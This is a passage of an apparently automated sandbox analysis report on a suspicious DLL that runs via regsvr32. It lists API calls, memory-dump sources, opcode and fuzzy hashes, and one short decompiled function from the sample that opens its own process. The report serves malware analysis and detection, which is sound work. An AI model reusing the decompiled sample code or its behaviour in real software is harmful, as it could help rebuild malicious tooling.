                                                                                                                                                                                                                                                                    • Opcode ID: 6be537a930ba9c7d4cb1123006079951051b1450ff32bab565c90c249bc49e40
                                                                                                                                                                                                                                                                    • Instruction ID: 17c9a7a92796a0a6d12c75994c727340f11170336c9adad4fc49af5d5dc17201
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6be537a930ba9c7d4cb1123006079951051b1450ff32bab565c90c249bc49e40
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB2171F160060ADFDB40EFA9D990E5B7BFCFB55284B118426E845D7212E730ED46ABE0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,6E238DA8,6E23700A,6E237312), ref: 6E2391A7
                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2391B5
                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2391CE
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,6E238DA8,6E23700A,6E237312), ref: 6E239220
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                    • Opcode ID: 60ae02611749972d842b700a6a022a784de06b2222b6f7eb8186a65568a7fc9e
                                                                                                                                                                                                                                                                    • Instruction ID: 930277948b7e7d787cff071e99c6885fe24a7b571aceae47d41331a3c5d5c687
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60ae02611749972d842b700a6a022a784de06b2222b6f7eb8186a65568a7fc9e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 310122F2219A3F9FEF1411F5AC8CA96375BEB03779730022AE520910C9EF924825DD24
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 1740715915-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: c98c0a8c22912f7a8176bdbd3770440f331ecb41c43c7e77dc0dadf1a08ae1b6
                                                                                                                                                                                                                                                                    • Instruction ID: 36f33edce26857166440eb809913867e5f9506fd293a054d9989b9538df4a162
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c98c0a8c22912f7a8176bdbd3770440f331ecb41c43c7e77dc0dadf1a08ae1b6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D451A0F650462F9FDB148FD9C850BAAB7BAAF02715F204529E8154A2D8DF31E860CF90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6E24120C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                    • API String ID: 0-3922119987
                                                                                                                                                                                                                                                                    • Opcode ID: 6550e506ada450b4f32768c1e5ee30bf7dfdfe672b1a57dd6a9019d2a9035819
                                                                                                                                                                                                                                                                    • Instruction ID: f25f4eab8f2f5374e3eda02fb91543d6349478fe7a208cedafa672b80af60d9c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6550e506ada450b4f32768c1e5ee30bf7dfdfe672b1a57dd6a9019d2a9035819
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C218E7161422EEF9B58DFE5DC80D9B77AFAF053697104A14F928D7150E730ECA88BA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457C7
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457D9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457EB
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457FD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24580F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: b6cfef0e0eea268b052397803a2f4b4ea3abc4b3350a38ab18bafc1ef3de69ad
                                                                                                                                                                                                                                                                    • Instruction ID: 7d08c920d93dffcf1ec1fdc7d3acf7916c15eb3a41dfdec6daa18bebbd77aea9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6cfef0e0eea268b052397803a2f4b4ea3abc4b3350a38ab18bafc1ef3de69ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FF0377148062EDB8B94DA98F8C8C4A33EFBB007127714809E4ACD7500DB31F8808EA4
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID: *?
                                                                                                                                                                                                                                                                    • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                                    • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                                    • Instruction ID: edf36dcc8f8690f171f25a929bab9b3563e75a4eaf6223be9e423c542be32cbd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37614CB5D0021EDFCB18CFA8C8809DDBBF6EF58314B248569D815E7304E775AA818F90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6E238E5F
                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6E238F13
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm$y#n
                                                                                                                                                                                                                                                                    • API String ID: 3480331319-2264020820
                                                                                                                                                                                                                                                                    • Opcode ID: 53c551ef0f91e53f92d586c355918dea2692a6dd600710c15c5a8fba4c3db24d
                                                                                                                                                                                                                                                                    • Instruction ID: 0c78d4a9b987671d6dea87edb5512f9bf97fdd85dcde71b351a3198715b3d5a9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53c551ef0f91e53f92d586c355918dea2692a6dd600710c15c5a8fba4c3db24d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF41E5B491022E9BCF44CFA8C844A9EBBB7BF45318F208556E9189F381D7329A01CF90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 6E2398AB
                                                                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6E239991
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                    • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                                    • Opcode ID: a44f195f029b380c9684bd775e41b6d07bd2dfeb0883ed15374457165f229a0e
                                                                                                                                                                                                                                                                    • Instruction ID: cd0c1d6e432eb3fc75652b6c5156116ba26da7a9ad62c8d82514666e3ede15e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a44f195f029b380c9684bd775e41b6d07bd2dfeb0883ed15374457165f229a0e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 514159B190021EAFCF02CFD4CC80AEE7BB6BF49305F244059E91967259DB35A960DF50
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,6E26947C,00000000,?,?,6E23C2C2,?,?,6E23C28A,?,?,?), ref: 6E23C325
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6E269494), ref: 6E23C338
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6E23C2C2,?,?,6E23C28A,?,?,?), ref: 6E23C35B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: fa1209aeff62d775ae76282ee327f6e109fea5a59c4830fcbc2cc39d42f3c454
                                                                                                                                                                                                                                                                    • Instruction ID: 7a687c9d759b45a116d3db7e8a1899168a40b42ce57c36f168b3c302217ccc25
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa1209aeff62d775ae76282ee327f6e109fea5a59c4830fcbc2cc39d42f3c454
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0827150052FFBDF01AB91C94DBDDBB76EB00756F140060E905A5150CB728E50DEA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E246DAD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E246DD6
                                                                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000,6E244603,00000000,6E23FCD2,?,?,?,?,?,?,?,6E244603,6E23FCD2,00000000), ref: 6E246E08
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,6E244603,6E23FCD2,00000000,?,?,?,?,00000000,?), ref: 6E246E24
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1547350101-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1ff5e90bcf1c8e3112e5ad11cf76320d536373f8fd99c644345166fee6e4b8e3
                                                                                                                                                                                                                                                                    • Instruction ID: c735588c6742cc2f8f27a00a8e403b67b311d0d6bd923d6dffa6f3614900a652
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff5e90bcf1c8e3112e5ad11cf76320d536373f8fd99c644345166fee6e4b8e3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF41C2BA920A0EDBDB096FF8CC80FCD37BBAF45365F240914E424A7194EB71C8448E21
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2410C1: _free.LIBCMT ref: 6E2410CF
                                                                                                                                                                                                                                                                      • Part of subcall function 6E241C1A: WideCharToMultiByte.KERNEL32(?,00000000,6E23F667,00000000,00000001,6E23F5F6,6E243EDB,?,6E23F667,?,00000000,?,6E243C4A,0000FDE9,00000000,?), ref: 6E241CBC
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E240B07
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E240B0E
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E240B4D
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E240B54
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 167067550-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0e8f8ff1ad683a03588f043c0a7ee94e31e75e5ee58ba20ae700419b0ab8e5d3
                                                                                                                                                                                                                                                                    • Instruction ID: 1df7ba487e0dbb17035138ddd7d6e0fc38cdfd839efbd40d635a7ee08f2b41af
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e8f8ff1ad683a03588f043c0a7ee94e31e75e5ee58ba20ae700419b0ab8e5d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D621C47160421EEF9B199FE6CC90C9B77BFEF113687104914E92987140E731EC908FA6
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 1478d614d4fe1469bb8aee1714bd6194960fb516bda7eaddc93b7203bb598ae9
                                                                                                                                                                                                                                                                    • Instruction ID: ee0efca33cca45524b456867e12551e4ec800044271664178559e85a45e6f741
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1478d614d4fe1469bb8aee1714bd6194960fb516bda7eaddc93b7203bb598ae9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B212779F0162BEBCB169AE9CC84B5B376B9B03B61F110510ED15A7280E770ED68C9F0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,6E243991,?,00000001,6E23F667,?,6E243E50,00000001,?,?,?,6E23F5F6,?,?), ref: 6E23D3B1
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D40E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D444
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6E2700D0,000000FF,?,6E243E50,00000001,?,?,?,6E23F5F6,?,?,?,6E26EBD8,0000002C,6E23F667), ref: 6E23D44F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                    • Opcode ID: 93abd0daf2e8af3d39a20f9a631d5307927fbf03d326a87fdf52fea4ccead129
                                                                                                                                                                                                                                                                    • Instruction ID: b6521156d952190c61ba2f454fa89e596b8427a820dcfb5bb5a10a338ec00fe7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93abd0daf2e8af3d39a20f9a631d5307927fbf03d326a87fdf52fea4ccead129
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2411EBB620462EABDB5516F6DC84F5A235FA7C2679F350524F624D71C0EFA29C04CD31
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000001,00000001,6E270096,6E23D67C,6E23D707,6E270094,?,6E237E19,6E270096,6E270094,?,?,?,6E234DCE,00000001,6E270098), ref: 6E23D508
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D565
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D59B
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6E2700D0,000000FF,?,6E237E19,6E270096,6E270094,?,?,?,6E234DCE,00000001,6E270098), ref: 6E23D5A6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9c1bb594d54ec18600d9227f026ead34996c8f5663c9fc417cf706addbf961a2
                                                                                                                                                                                                                                                                    • Instruction ID: f8298283d072e4fc48fcfb5ec16d1f3ae90cb959e10be8ca6ffc9353df4fb204
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c1bb594d54ec18600d9227f026ead34996c8f5663c9fc417cf706addbf961a2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A110AF625062AAFDB5616F6DC84F5A235FA7C267DB300724F528D31C0EBA28808CD30
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,6E23A304,?,?,6E27C7C4,00000000,?,6E23A42F,00000004,6E2693A4,6E26939C,6E2693A4,00000000), ref: 6E23A2D3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8b91c8622159262a58a474c354ba782cfd22e5975eda48d92c158cbad64805fd
                                                                                                                                                                                                                                                                    • Instruction ID: 4add0e76b800213f7974f452410f2f2f3ea3bbc44c7d122cad41fc2d19ff3337
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b91c8622159262a58a474c354ba782cfd22e5975eda48d92c158cbad64805fd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5011A7F1A4593BABDF729AE9CC44B4933A69B06761F210131ED11A7284D6B1E900CEE1
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                    			E6E1F146C() {
                                                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                                    				long _t5;
                                                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                                                    				intOrPtr _t8;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t8 =  *0x6e1f41b0;
                                                                                                                                                                                                                                                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                    				 *0x6e1f41bc = _t1;
                                                                                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t3 = GetVersion();
                                                                                                                                                                                                                                                                    				if(_t3 <= 5) {
                                                                                                                                                                                                                                                                    					_t4 = 0x32;
                                                                                                                                                                                                                                                                    					return _t4;
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					 *0x6e1f41ac = _t3;
                                                                                                                                                                                                                                                                    					_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                    					 *0x6e1f41a8 = _t5;
                                                                                                                                                                                                                                                                    					 *0x6e1f41b0 = _t8;
                                                                                                                                                                                                                                                                    					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                                                    					 *0x6e1f41a4 = _t6;
                                                                                                                                                                                                                                                                    					if(_t6 == 0) {
                                                                                                                                                                                                                                                                    						 *0x6e1f41a4 =  *0x6e1f41a4 | 0xffffffff;
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                    0x6e1f146d
                                                                                                                                                                                                                                                                    0x6e1f147b
                                                                                                                                                                                                                                                                    0x6e1f1483
                                                                                                                                                                                                                                                                    0x6e1f1488
                                                                                                                                                                                                                                                                    0x6e1f14d2
                                                                                                                                                                                                                                                                    0x6e1f14d2
                                                                                                                                                                                                                                                                    0x6e1f148a
                                                                                                                                                                                                                                                                    0x6e1f1492
                                                                                                                                                                                                                                                                    0x6e1f14ce
                                                                                                                                                                                                                                                                    0x6e1f14d0
                                                                                                                                                                                                                                                                    0x6e1f1494
                                                                                                                                                                                                                                                                    0x6e1f1494
                                                                                                                                                                                                                                                                    0x6e1f1499
                                                                                                                                                                                                                                                                    0x6e1f14a7
                                                                                                                                                                                                                                                                    0x6e1f14ac
                                                                                                                                                                                                                                                                    0x6e1f14b2
                                                                                                                                                                                                                                                                    0x6e1f14ba
                                                                                                                                                                                                                                                                    0x6e1f14bf
                                                                                                                                                                                                                                                                    0x6e1f14c1
                                                                                                                                                                                                                                                                    0x6e1f14c1
                                                                                                                                                                                                                                                                    0x6e1f14cb
                                                                                                                                                                                                                                                                    0x6e1f14cb

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1F17B8,747863F0,00000000), ref: 6E1F147B
                                                                                                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 6E1F148A
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 6E1F1499
                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1F14B2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605607675.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605592920.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605617714.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605625541.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605634328.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 845504543-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6e6229670eb7cf412ae304f6c5a30cbb8bcedad6174fff8349c1a8ce7a571b74
                                                                                                                                                                                                                                                                    • Instruction ID: fa8a1ed508eb33278808408c4792eafa06a49470413e9c8f79c90e3b0c9e5c8c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e6229670eb7cf412ae304f6c5a30cbb8bcedad6174fff8349c1a8ce7a571b74
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F01771648A11AFEF509FA9B909B493BE4B716B11F14801AF117D91C1D3B06083BBD9
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,6E23F667,00000000,?,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001), ref: 6E247C03
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000,00000001,?,6E243E74,6E23F5F6), ref: 6E247C0F
                                                                                                                                                                                                                                                                      • Part of subcall function 6E247BD5: CloseHandle.KERNEL32(6E270910,6E247C1F,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000,00000001), ref: 6E247BE5
                                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 6E247C1F
                                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,6E23F667,00000000,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000), ref: 6E247C34
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseErrorHandleLast___initconout
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 892448922-0
                                                                                                                                                                                                                                                                    • Opcode ID: e5fd61ecb2c54352c8bf2eed2ef41dbc4b347b3992cc299c9179e2be72fe1c13
                                                                                                                                                                                                                                                                    • Instruction ID: c5eb5911c063fb28d765f2d7896f0235507a8151d7e1f3577a679bcd0b015d4b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5fd61ecb2c54352c8bf2eed2ef41dbc4b347b3992cc299c9179e2be72fe1c13
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F01C3610152DFBDF662FD1CC0CD893F6BFB4A7A1F044410FA29951A0D6728934DBA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605649781.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                    • API String ID: 0-3922119987
